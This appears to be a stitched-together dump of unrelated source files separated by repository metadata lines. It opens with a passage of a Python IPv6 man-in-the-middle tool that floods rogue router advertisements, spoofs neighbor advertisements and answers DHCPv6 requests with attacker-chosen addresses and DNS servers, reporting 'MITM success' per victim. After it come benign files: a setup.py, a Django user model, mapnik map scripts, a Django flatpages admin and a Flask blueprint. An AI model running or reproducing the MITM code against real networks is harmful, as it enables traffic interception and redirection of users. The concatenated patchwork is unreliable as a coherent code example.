Base.print_info("Last suffix offer IP: ", str(last_suffix))
Base.print_info("Prefix: ", network_prefix)
Base.print_info("Router IPv6 address: ", your_local_ipv6_address)
Base.print_info("DNS IPv6 address: ", recursive_dns_address)
Base.print_info("Domain search: ", dns_search)
# endregion
# region Add client info in global clients dictionary
def add_client_info_in_dictionary(client_mac_address, client_info, this_client_already_in_dictionary=False):
if this_client_already_in_dictionary:
clients[client_mac_address].update(client_info)
else:
clients[client_mac_address] = client_info
# endregion
# region Send ICMPv6 solicit packets
def send_icmpv6_solicit_packets():
icmpv6_solicit_raw_socket = socket(AF_PACKET, SOCK_RAW)
icmpv6_solicit_raw_socket.bind((current_network_interface, 0))
try:
while True:
icmpv6_solicit_packet = icmpv6.make_router_solicit_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
need_source_link_layer_address=True,
source_link_layer_address=eth.get_random_mac())
icmpv6_solicit_raw_socket.send(icmpv6_solicit_packet)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
icmpv6_solicit_raw_socket.close()
exit(0)
# endregion
# region Send DHCPv6 solicit packets
def send_dhcpv6_solicit_packets():
dhcpv6_solicit_raw_socket = socket(AF_PACKET, SOCK_RAW)
dhcpv6_solicit_raw_socket.bind((current_network_interface, 0))
try:
while True:
Client_DUID = dhcpv6.get_duid(eth.get_random_mac())
request_options = [23, 24]
dhcpv6_solicit_packet = dhcpv6.make_solicit_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
transaction_id=randint(1, 16777215),
client_identifier=Client_DUID,
option_request_list=request_options)
dhcpv6_solicit_raw_socket.send(dhcpv6_solicit_packet)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
dhcpv6_solicit_raw_socket.close()
exit(0)
# endregion
# region Send ICMPv6 advertise packets
def send_icmpv6_advertise_packets():
icmpv6_advertise_raw_socket = socket(AF_PACKET, SOCK_RAW)
icmpv6_advertise_raw_socket.bind((current_network_interface, 0))
icmpv6_ra_packet = icmpv6.make_router_advertisement_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac="33:33:00:00:00:01",
ipv6_src=your_local_ipv6_address,
ipv6_dst="ff02::1",
dns_address=recursive_dns_address,
domain_search=dns_search,
prefix=network_prefix,
router_lifetime=5000,
advertisement_interval=int(args.delay) * 1000)
try:
while True:
icmpv6_advertise_raw_socket.send(icmpv6_ra_packet)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
icmpv6_advertise_raw_socket.close()
exit(0)
# endregion
# region Reply to DHCPv6 and ICMPv6 requests
def reply(request):
# region Define global variables
global global_socket
global disable_dhcpv6
global clients
global target_ipv6_address
global first_suffix
global last_suffix
# endregion
# region Get client MAC address
client_mac_address = request['Ethernet']['source']
# endregion
# region Check this client already in global clients dictionary
client_already_in_dictionary = False
if client_mac_address in clients.keys():
client_already_in_dictionary = True
# endregion
# region ICMPv6
if 'ICMPv6' in request.keys():
# region ICMPv6 Router Solicitation
if request['ICMPv6']['type'] == 133:
# Make and send ICMPv6 router advertisement packet
icmpv6_ra_packet = icmpv6.make_router_advertisement_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
dns_address=recursive_dns_address,
domain_search=dns_search,
prefix=network_prefix,
router_lifetime=5000)
global_socket.send(icmpv6_ra_packet)
# Print info messages
Base.print_info("ICMPv6 Router Solicitation request from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")")
Base.print_info("ICMPv6 Router Advertisement reply to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")")
# Delete this client from global clients dictionary
try:
del clients[client_mac_address]
client_already_in_dictionary = False
except KeyError:
pass
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"router solicitation": True,
"network prefix": network_prefix},
client_already_in_dictionary)
# endregion
# region ICMPv6 Neighbor Solicitation
if request['ICMPv6']['type'] == 135:
# region Get ICMPv6 Neighbor Solicitation target address
target_address = request['ICMPv6']['target-address']
# endregion
# region Network prefix in ICMPv6 Neighbor Solicitation target address is bad
if not target_address.startswith('fe80::'):
if not target_address.startswith(network_prefix_address):
na_packet = icmpv6.make_neighbor_advertisement_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
target_ipv6_address=target_address)
for _ in range(5):
global_socket.send(na_packet)
# endregion
# region ICMPv6 Neighbor Solicitation target address is your local IPv6 address
if target_address == your_local_ipv6_address:
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"neighbor solicitation your address": True},
client_already_in_dictionary)
# endregion
# region DHCPv6 advertise address is set
# This client already in dictionary
if client_already_in_dictionary:
# Advertise address for this client is set
if 'advertise address' in clients[client_mac_address].keys():
# ICMPv6 Neighbor Solicitation target address is DHCPv6 advertise IPv6 address
if target_address == clients[client_mac_address]['advertise address']:
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"neighbor solicitation advertise address": True},
client_already_in_dictionary)
# ICMPv6 Neighbor Solicitation target address is not DHCPv6 advertise IPv6 address
else:
if not target_address.startswith('fe80::'):
na_packet = icmpv6.make_neighbor_advertisement_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
target_ipv6_address=target_address)
for _ in range(5):
global_socket.send(na_packet)
# endregion
# region Print MITM Success message
if not disable_dhcpv6:
try:
if clients[client_mac_address]['dhcpv6 mitm'] == 'success':
test = clients[client_mac_address]['neighbor solicitation your address']
try:
test = clients[client_mac_address]['success message']
except KeyError:
Base.print_success("MITM success: ",
clients[client_mac_address]['advertise address'] +
" (" + client_mac_address + ")")
clients[client_mac_address].update({"success message": True})
except KeyError:
pass
# endregion
# endregion
# endregion
# region DHCPv6
# Protocol DHCPv6 is enabled
if not disable_dhcpv6:
if 'DHCPv6' in request.keys():
# region DHCPv6 Solicit
if request['DHCPv6']['message-type'] == 1:
# Get Client DUID time from Client Identifier DUID
client_duid_time = 0
for dhcpv6_option in request['DHCPv6']['options']:
if dhcpv6_option['type'] == 1:
client_duid_time = dhcpv6_option['value']['duid-time']
# Set IPv6 address in advertise packet
if target_ipv6_address is not None:
ipv6_address = target_ipv6_address
else:
ipv6_address = network_prefix.split('/')[0] + str(randint(first_suffix, last_suffix))
# Make and send DHCPv6 advertise packet
dhcpv6_advertise = dhcpv6.make_advertise_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
transaction_id=request['DHCPv6']['transaction-id'],
dns_address=recursive_dns_address,
domain_search=dns_search,
ipv6_address=ipv6_address,
client_duid_timeval=client_duid_time)
global_socket.send(dhcpv6_advertise)
# Print info messages
Base.print_info("DHCPv6 Solicit from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']))
Base.print_info("DHCPv6 Advertise to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" IAA: ", ipv6_address)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 solicit": True,
"advertise address": ipv6_address},
client_already_in_dictionary)
# endregion
# region DHCPv6 Request
if request['DHCPv6']['message-type'] == 3:
# Set DHCPv6 reply packet
dhcpv6_reply = None
# region Get Client DUID time, IPv6 address and Server MAC address
client_duid_time = 0
client_ipv6_address = None
server_mac_address = None
for dhcpv6_option in request['DHCPv6']['options']:
if dhcpv6_option['type'] == 1:
client_duid_time = dhcpv6_option['value']['duid-time']
if dhcpv6_option['type'] == 2:
server_mac_address = dhcpv6_option['value']['mac-address']
if dhcpv6_option['type'] == 3:
client_ipv6_address = dhcpv6_option['value']['ipv6-address']
# endregion
if server_mac_address and client_ipv6_address is not None:
# Check Server MAC address
if server_mac_address != your_mac_address:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm":
"error: server mac address is not your mac address"},
client_already_in_dictionary)
else:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm": "success"},
client_already_in_dictionary)
try:
if client_ipv6_address == clients[client_mac_address]['advertise address']:
dhcpv6_reply = dhcpv6.make_reply_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
transaction_id=request['DHCPv6']
['transaction-id'],
dns_address=recursive_dns_address,
domain_search=dns_search,
ipv6_address=client_ipv6_address,
client_duid_timeval=client_duid_time)
global_socket.send(dhcpv6_reply)
else:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm":
"error: client request address is not advertise address"},
client_already_in_dictionary)
except KeyError:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm":
"error: not found dhcpv6 solicit request for this client"},
client_already_in_dictionary)
# Print info messages
Base.print_info("DHCPv6 Request from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" Server: ", server_mac_address,
" IAA: ", client_ipv6_address)
if dhcpv6_reply is not None:
Base.print_info("DHCPv6 Reply to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" Server: ", server_mac_address,
" IAA: ", client_ipv6_address)
else:
if clients[client_mac_address]["dhcpv6 mitm"] == \
"error: server mac address is not your mac address":
Base.print_error("Server MAC address in DHCPv6 Request is not your MAC address " +
"for this client: ", client_mac_address)
if clients[client_mac_address]["dhcpv6 mitm"] == \
"error: client request address is not advertise address":
Base.print_error("Client requested IPv6 address is not advertise IPv6 address " +
"for this client: ", client_mac_address)
if clients[client_mac_address]["dhcpv6 mitm"] == \
"error: not found dhcpv6 solicit request for this client":
Base.print_error("Could not found DHCPv6 solicit request " +
"for this client: ", client_mac_address)
# endregion
# region DHCPv6 Release
if request['DHCPv6']['message-type'] == 8:
# Print info message
Base.print_info("DHCPv6 Release from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']))
# Delete this client from global clients dictionary
try:
del clients[client_mac_address]
client_already_in_dictionary = False
except KeyError:
pass
# endregion
# region DHCPv6 Confirm
if request['DHCPv6']['message-type'] == 4:
# region Get Client DUID time and client IPv6 address
client_duid_time = 0
client_ipv6_address = None
for dhcpv6_option in request['DHCPv6']['options']:
if dhcpv6_option['type'] == 1:
client_duid_time = dhcpv6_option['value']['duid-time']
if dhcpv6_option['type'] == 3:
client_ipv6_address = dhcpv6_option['value']['ipv6-address']
# endregion
# region Make and send DHCPv6 Reply packet
dhcpv6_reply = dhcpv6.make_reply_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
transaction_id=request['DHCPv6']['transaction-id'],
dns_address=recursive_dns_address,
domain_search=dns_search,
ipv6_address=client_ipv6_address,
client_duid_timeval=client_duid_time)
global_socket.send(dhcpv6_reply)
# endregion
# region Add Client info in global clients dictionary and print info message
add_client_info_in_dictionary(client_mac_address,
{"advertise address": client_ipv6_address,
"dhcpv6 mitm": "success"},
client_already_in_dictionary)
Base.print_info("DHCPv6 Confirm from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" IAA: ", client_ipv6_address)
Base.print_info("DHCPv6 Reply to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" IAA: ", client_ipv6_address)
# endregion
# endregion
# # DHCPv6 Decline
# if request.haslayer(DHCP6_Decline):
# print Base.c_warning + "Sniff DHCPv6 Decline from: " + request[IPv6].src + " (" + \
# request[Ether].src + ") TID: " + hex(request[DHCP6_Decline].trid) + \
# " IAADDR: " + request[DHCP6OptIAAddress].addr
# # print request.summary
# endregion
# endregion
# region Main function
if __name__ == "__main__":
# region Send ICMPv6 advertise packets in other thread
tm.add_task(send_icmpv6_advertise_packets)
# endregion
# region Add multicast MAC addresses on interface
try:
Base.print_info("Get milticast MAC address on interface: ", current_network_interface)
mcast_addresses = sub.Popen(['ip maddress show ' + current_network_interface], shell=True, stdout=sub.PIPE)
out, err = mcast_addresses.communicate()
if icmpv6_router_solicitation_address not in out:
icmpv6_mcast_address = sub.Popen(['ip maddress add ' + icmpv6_router_solicitation_address +
' dev ' + current_network_interface], shell=True, stdout=sub.PIPE)
out, err = icmpv6_mcast_address.communicate()
if out == "":
Base.print_info("Add milticast MAC address: ", icmpv6_router_solicitation_address,
" on interface: ", current_network_interface)
else:
Base.print_error("Could not add milticast MAC address: ", icmpv6_router_solicitation_address,
" on interface: ", current_network_interface)
exit(1)
if dhcpv6_requests_address not in out:
dhcp6_mcast_address = sub.Popen(['ip maddress add ' + dhcpv6_requests_address +
' dev ' + current_network_interface], shell=True, stdout=sub.PIPE)
out, err = dhcp6_mcast_address.communicate()
if out == "":
Base.print_info("Add milticast MAC address: ", dhcpv6_requests_address,
" on interface: ", current_network_interface)
else:
Base.print_error("Could not add milticast MAC address: ", dhcpv6_requests_address,
" on interface: ", current_network_interface)
exit(1)
except OSError as e:
if e.errno == errno.ENOENT:
Base.print_error("Program: ", "ip", " is not installed!")
exit(1)
else:
Base.print_error("Something went wrong while trying to run ", "`ip`")
exit(2)
# endregion
# region Create RAW socket for sniffing
raw_socket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
# endregion
# region Print info message
Base.print_info("Waiting for a ICMPv6 or DHCPv6 requests ...")
# endregion
# region Start sniffing
while True:
# region Try
try:
# region Sniff packets from RAW socket
packets = raw_socket.recvfrom(2048)
for packet in packets:
# region Parse Ethernet header
ethernet_header = packet[:eth.header_length]
ethernet_header_dict = eth.parse_header(ethernet_header)
# endregion
# region Could not parse Ethernet header - break
if ethernet_header_dict is None:
break
# endregion
# region Ethernet filter
if target_mac_address is not None:
if ethernet_header_dict['source'] != target_mac_address:
break
else:
if ethernet_header_dict['source'] == your_mac_address:
break
# endregion
# region IPv6 packet
# 34525 - Type of IP packet (0x86dd)
if ethernet_header_dict['type'] != ipv6.header_type:
break
# region Parse IPv6 header
ipv6_header = packet[eth.header_length:eth.header_length + ipv6.header_length]
ipv6_header_dict = ipv6.parse_header(ipv6_header)
# endregion
# region Could not parse IPv6 header - break
if ipv6_header_dict is None:
break
# endregion
# region UDP
if ipv6_header_dict['next-header'] == udp.header_type:
# region Parse UDP header
udp_header_offset = eth.header_length + ipv6.header_length
udp_header = packet[udp_header_offset:udp_header_offset + udp.header_length]
udp_header_dict = udp.parse_header(udp_header)
# endregion
# region Could not parse UDP header - break
if udp_header_dict is None:
break
# endregion
# region DHCPv6 packet
if udp_header_dict['destination-port'] == 547 and udp_header_dict['source-port'] == 546:
# region Parse DHCPv6 request packet
dhcpv6_packet_offset = udp_header_offset + udp.header_length
dhcpv6_packet = packet[dhcpv6_packet_offset:]
dhcpv6_packet_dict = dhcpv6.parse_packet(dhcpv6_packet)
# endregion
# region Could not parse DHCPv6 request packet - break
if dhcpv6_packet_dict is None:
break
# endregion
# region Call function with full DHCPv6 packet
reply({
"Ethernet": ethernet_header_dict,
"IPv6": ipv6_header_dict,
"UDP": udp_header_dict,
"DHCPv6": dhcpv6_packet_dict
})
# endregion
# endregion
# endregion
# region ICMPv6
if ipv6_header_dict['next-header'] == icmpv6.packet_type:
# region Parse ICMPv6 packet
icmpv6_packet_offset = eth.header_length + ipv6.header_length
icmpv6_packet = packet[icmpv6_packet_offset:]
icmpv6_packet_dict = icmpv6.parse_packet(icmpv6_packet)
# endregion
# region Could not parse ICMPv6 packet - break
if icmpv6_packet_dict is None:
break
# endregion
# region ICMPv6 filter
if icmpv6_packet_dict['type'] == 133 or 135:
pass
else:
break
# endregion
# region Call function with full ICMPv6 packet
reply({
"Ethernet": ethernet_header_dict,
"IPv6": ipv6_header_dict,
"ICMPv6": icmpv6_packet_dict
})
# endregion
# endregion
# endregion
# endregion
# endregion
# region Exception - KeyboardInterrupt
except KeyboardInterrupt:
Base.print_info("Exit")
exit(0)
# endregion
# endregion
# endregion
| unlicense | 7,659,077,770,600,407,000 | 43.846914 | 121 | 0.500248 | false |
JoshData/diff_match_patch-python | setup.py | 2 | 1307 | from setuptools import setup, find_packages, Extension
# Note to self: To upload a new version to PyPI, run:
# pip install wheel twine
# python setup.py sdist bdist_wheel
# twine upload dist/*
module1 = Extension('diff_match_patch',
sources = ['interface.cpp'],
include_dirs = [],
libraries = [])
setup(
name='diff_match_patch_python',
version='1.0.2',
description=u'A Python extension module that wraps Google\'s diff_match_patch C++ implementation for very fast string comparisons. Version 1.0.2 fixes a build issue on Macs.',
long_description=open("README.rst").read(),
author=u'Joshua Tauberer',
author_email=u'[email protected]',
url='https://github.com/JoshData/diff_match_patch-python',
packages=find_packages(),
license='CC0 (copyright waived)',
keywords="diff compare Google match patch diff_match_patch extension native C fast",
ext_modules=[module1],
classifiers=[
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
test_suite='tests',
)
| cc0-1.0 | -4,188,308,818,056,781,300 | 37.441176 | 179 | 0.636572 | false |
SeaItRise/SeaItRise-webportal | src/accounts/models.py | 1 | 4568 | import uuid
from datetime import timedelta
from django.conf import settings
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
class MyUserManager(BaseUserManager):
def _create_user(self, email, password, first_name, last_name, is_staff, is_superuser, **extra_fields):
"""
Create and save an User with the given email, password, name and phone number.
:param email: string
:param password: string
:param first_name: string
:param last_name: string
:param is_staff: boolean
:param is_superuser: boolean
:param extra_fields:
:return: User
"""
now = timezone.now()
email = self.normalize_email(email)
user = self.model(email=email,
first_name=first_name,
last_name=last_name,
is_staff=is_staff,
is_active=True,
is_superuser=is_superuser,
last_login=now,
date_joined=now, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_user(self, email, first_name, last_name, password, **extra_fields):
"""
Create and save an User with the given email, password and name.
:param email: string
:param first_name: string
:param last_name: string
:param password: string
:param extra_fields:
:return: User
"""
return self._create_user(email, password, first_name, last_name, is_staff=False, is_superuser=False,
**extra_fields)
def create_superuser(self, email, first_name='', last_name='', password=None, **extra_fields):
"""
Create a super user.
:param email: string
:param first_name: string
:param last_name: string
:param password: string
:param extra_fields:
:return: User
"""
return self._create_user(email, password, first_name, last_name, is_staff=True, is_superuser=True,
**extra_fields)
class User(AbstractBaseUser):
"""
Model that represents an user.
To be active, the user must register and confirm his email.
"""
GENDER_MALE = 'M'
GENDER_FEMALE = 'F'
GENDER_CHOICES = (
(GENDER_MALE, 'Male'),
(GENDER_FEMALE, 'Female')
)
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
first_name = models.CharField(_('First Name'), max_length=50)
last_name = models.CharField(_('Last Name'), max_length=50)
email = models.EmailField(_('Email address'), unique=True)
gender = models.CharField(max_length=1, choices=GENDER_CHOICES, default=GENDER_MALE)
confirmed_email = models.BooleanField(default=False)
is_staff = models.BooleanField(_('staff status'), default=False)
is_superuser = models.BooleanField(_('superuser status'), default=False)
is_active = models.BooleanField(_('active'), default=True)
date_joined = models.DateTimeField(_('date joined'), auto_now_add=True)
date_updated = models.DateTimeField(_('date updated'), auto_now=True)
activation_key = models.UUIDField(unique=True, default=uuid.uuid4) # email
USERNAME_FIELD = 'email'
objects = MyUserManager()
def __str__(self):
"""
Unicode representation for an user model.
:return: string
"""
return self.email
def get_full_name(self):
"""
Return the first_name plus the last_name, with a space in between.
:return: string
"""
return "{0} {1}".format(self.first_name, self.last_name)
def get_short_name(self):
"""
Return the first_name.
:return: string
"""
return self.first_name
def activation_expired(self):
"""
Check if user's activation has expired.
:return: boolean
"""
return self.date_joined + timedelta(days=settings.ACCOUNT_ACTIVATION_DAYS) < timezone.now()
def confirm_email(self):
"""
Confirm email.
:return: boolean
"""
if not self.activation_expired() and not self.confirmed_email:
self.confirmed_email = True
self.save()
return True
return False
| mit | -9,196,402,323,068,319,000 | 29.657718 | 108 | 0.59282 | false |
sbobovyc/Scalable-Warfare-Engine | src/utils/mapmaker/src/mapmaker.py | 1 | 7129 | """
Created on December 12, 2011
@author: sbobovyc
"""
"""
Copyright (C) 2011 Stanislav Bobovych
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import ctypes
import os
try:
import mapnik2
except:
print '\n\nThe mapnik library and python bindings must have been compiled and \
installed successfully before running this script.\n\n'
sys.exit(1)
def print_mapnik_plugins():
from mapnik2 import DatasourceCache as c; print ','.join(c.plugin_names())
def query_data():
from osgeo import gdal
ds = gdal.Open("../world_one_mapCLIPPED.tif", gdal.GA_ReadOnly)
width = ds.RasterXSize
height = ds.RasterYSize
proj = ds.GetProjection()
gt = ds.GetGeoTransform()
minx = gt[0]
miny = gt[3] + width*gt[4] + height*gt[5]
maxx = gt[0] + width*gt[1] + height*gt[2]
maxy = gt[3]
print width, height, proj, gt
print minx, miny, maxx, maxy
print "Affine transform"
#http://www.gdal.org/gdal_datamodel.html
#http://svn.osgeo.org/gdal/trunk/gdal/swig/python/samples/tolatlong.py
Xgeo = gt[0] + 0*gt[1] + 0*gt[2]
Ygeo = gt[3] + 0*gt[4] + 0*gt[5]
# Shift to the center of the pixel
Xgeo += gt[1] / 2.0
Ygeo += gt[5] / 2.0
print Ygeo, Xgeo
def create_testmap():
map_out = "map.png"
m = mapnik.Map(1024, 768)
style = mapnik.Style()
rule = mapnik.Rule()
rs = mapnik.RasterSymbolizer()
rule.symbols.append(rs)
style.rules.append(rule)
m.append_style('raster',style)
lyr = mapnik.Layer('raster')
lyr.datasource = mapnik.Gdal(base='..', file="world_one_mapCLIPPED.tif")
lyr.styles.append('raster')
m.layers.append(lyr)
symbolizer = mapnik.PolygonSymbolizer(mapnik.Color(255, 0, 0))
symbolizer.fill_opacity = 0.5
symbolizer.gamma = 0.0
rule.symbols.append(symbolizer)
style2 = mapnik.Style()
style2.rules.append(rule)
layer2 = mapnik.Layer("mapLayer")
layer2.datasource = mapnik.Shapefile(file="../border.shp")
layer2.styles.append("mapStyle")
m.background = mapnik.Color("steelblue")
m.append_style("mapStyle", style2)
m.layers.append(layer2)
m.zoom_all()
mapnik.render_to_file(m, map_out, 'png')
def create_testmap_db():
map_out = "map_from_db.png"
m = mapnik2.Map(1024, 768)
style = mapnik2.Style()
rule = mapnik2.Rule()
rs = mapnik2.RasterSymbolizer()
rule.symbols.append(rs)
style.rules.append(rule)
m.append_style('raster',style)
lyr = mapnik2.Layer('raster')
lyr.datasource = mapnik2.Gdal(base='..', file="world_one_mapCLIPPED.tif")
lyr.styles.append('raster')
m.layers.append(lyr)
symbolizer = mapnik2.PolygonSymbolizer(mapnik2.Color(255, 0, 0))
symbolizer.fill_opacity = 0.5
symbolizer.gamma = 0.0
rule.symbols.append(symbolizer)
style2 = mapnik2.Style()
style2.rules.append(rule)
layer2 = mapnik2.Layer("mapLayer")
layer2.datasource = mapnik2.SQLite(file="../border.sqlite", table='border', key_field='OGC_FID', geometry_field='GEOMETRY', wkb_format='spatialite', extent='-64.5721,31.0319,-4.50204,61.8924')
layer2.styles.append("mapStyle")
m.background = mapnik2.Color("steelblue")
m.append_style("mapStyle", style2)
m.layers.append(layer2)
m.zoom_all()
mapnik2.render_to_file(m, map_out, 'png')
def create_testmap_region_filter():
map_out = "map_from_db.png"
m = mapnik2.Map(1024, 768)
style = mapnik2.Style()
rule = mapnik2.Rule()
rs = mapnik2.RasterSymbolizer()
rule.symbols.append(rs)
style.rules.append(rule)
lyr = mapnik2.Layer('raster')
lyr.datasource = mapnik2.Gdal(base='..', file="world_one_mapCLIPPED.tif")
lyr.styles.append('raster')
m.append_style('raster',style)
m.layers.append(lyr)
symbolizer = mapnik2.PolygonSymbolizer(mapnik2.Color(255, 0, 0))
symbolizer.fill_opacity = 0.5
symbolizer.gamma = 0.0
rule.symbols.append(symbolizer)
style2 = mapnik2.Style()
style2.rules.append(rule)
layer2 = mapnik2.Layer("notSelected")
layer2.datasource = mapnik2.SQLite(file="../border.sqlite", table='(SELECT * from border WHERE Name IS NOT "Pi") as notSelected', key_field='OGC_FID', geometry_field='GEOMETRY', wkb_format='spatialite', extent='-64.5721,31.0319,-4.50204,61.8924')
layer2.styles.append("unselectedStyle")
symbolizer2 = mapnik2.PolygonSymbolizer(mapnik2.Color(0, 125, 125))
symbolizer2.fill_opacity = 0.5
symbolizer2.gamma = 0.0
rule.symbols.append(symbolizer2)
style3 = mapnik2.Style()
style3.rules.append(rule)
layer3 = mapnik2.Layer("selected")
layer3.datasource = mapnik2.SQLite(file="../border.sqlite", table='(SELECT * from border WHERE Name IS "Pi") as notSelected', key_field='OGC_FID', geometry_field='GEOMETRY', wkb_format='spatialite', extent='-64.5721,31.0319,-4.50204,61.8924')
layer3.styles.append("selectedStyle")
m.background = mapnik2.Color("steelblue")
m.append_style("unselectedStyle", style2)
m.append_style("selectedStyle", style3)
m.layers.append(layer2)
m.layers.append(layer3)
m.zoom_all()
mapnik2.render_to_file(m, map_out, 'png')
def create_testmap_db_point():
map_out = "map_pi.png"
m = mapnik2.Map(1024, 768)
style = mapnik2.Style()
rule = mapnik2.Rule()
rs = mapnik2.RasterSymbolizer()
rule.symbols.append(rs)
style.rules.append(rule)
m.append_style('raster',style)
lyr = mapnik2.Layer('raster')
lyr.datasource = mapnik2.Gdal(base='..', file="world_one_mapCLIPPED.tif")
lyr.styles.append('raster')
m.layers.append(lyr)
symbolizer = mapnik2.PointSymbolizer(mapnik2.PathExpression("draw_circle.png"))
symbolizer.allow_overlap = True
symbolizer.fill_opacity = 0.5
symbolizer.gamma = 0.0
rule.symbols.append(symbolizer)
style2 = mapnik2.Style()
style2.rules.append(rule)
layer2 = mapnik2.Layer("mapLayer")
layer2.datasource = mapnik2.SQLite(file="../test-2.3.sqlite", table='(SELECT * FROM Towns WHERE Peoples < 500) as data', key_field='PK_UID', geometry_field='GEOMETRY', wkb_format='spatialite', extent="319224,3934670,1308590,5214370")
print layer2.datasource.describe()
layer2.styles.append("mapStyle")
m.background = mapnik2.Color("red")
m.append_style("mapStyle", style2)
m.layers.append(layer2)
m.zoom_all()
mapnik2.render_to_file(m, map_out, 'png')
if __name__ == '__main__':
print_mapnik_plugins()
#create_testmap_db()
#create_testmap_db_region()
#create_testmap_region_filter()
query_data()
| gpl-3.0 | 2,024,511,455,187,752,400 | 33.274038 | 250 | 0.675971 | false |
greggian/TapdIn | django/contrib/flatpages/admin.py | 1 | 1100 | from django import forms
from django.contrib import admin
from django.contrib.flatpages.models import FlatPage
from django.utils.translation import ugettext_lazy as _
class FlatpageForm(forms.ModelForm):
url = forms.RegexField(label=_("URL"), max_length=100, regex=r'^[-\w/]+$',
help_text = _("Example: '/about/contact/'. Make sure to have leading"
" and trailing slashes."),
error_message = _("This value must contain only letters, numbers,"
" underscores, dashes or slashes."))
class Meta:
model = FlatPage
class FlatPageAdmin(admin.ModelAdmin):
form = FlatpageForm
fieldsets = (
(None, {'fields': ('url', 'title', 'content', 'sites')}),
(_('Advanced options'), {'classes': ('collapse',), 'fields': ('enable_comments', 'registration_required', 'template_name')}),
)
list_display = ('url', 'title')
list_filter = ('sites', 'enable_comments', 'registration_required')
search_fields = ('url', 'title')
admin.site.register(FlatPage, FlatPageAdmin)
| apache-2.0 | 7,297,535,413,985,754,000 | 37.285714 | 133 | 0.615455 | false |
2015fallhw/cdw11 | users/b/g11/bg11_40323247.py | 1 | 20505 | # 各組分別在各自的 .py 程式中建立應用程式 (第1步/總共3步)
from flask import Blueprint, render_template, make_response
# 利用 Blueprint建立 ag1, 並且 url 前綴為 /ag1, 並設定 template 存放目錄
bg11_40323247 = Blueprint('bg11_40323247', __name__, url_prefix='/bg11_40323247', template_folder='templates')
@bg11_40323247.route('/task47_1')
def task47_1():
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>網際 2D 繪圖</title>
<!-- IE 9: display inline SVG -->
<meta http-equiv="X-UA-Compatible" content="IE=9">
<script type="text/javascript" src="http://brython.info/src/brython_dist.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango-8v03.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango2D-6v13.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/CangoAxes-1v33.js"></script>
</head>
<body>
<script>
window.onload=function(){
brython(1);
}
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
<script type="text/python">
from javascript import JSConstructor
from browser import alert
from browser import window
import math
cango = JSConstructor(window.Cango)
cobj = JSConstructor(window.Cobj)
shapedefs = window.shapeDefs
obj2d = JSConstructor(window.Obj2D)
cgo = cango("plotarea")
cgo.setWorldCoords(-250, -250, 500, 500)
# 畫軸線
cgo.drawAxes(0, 240, 0, 240, {
"strokeColor":"#aaaaaa",
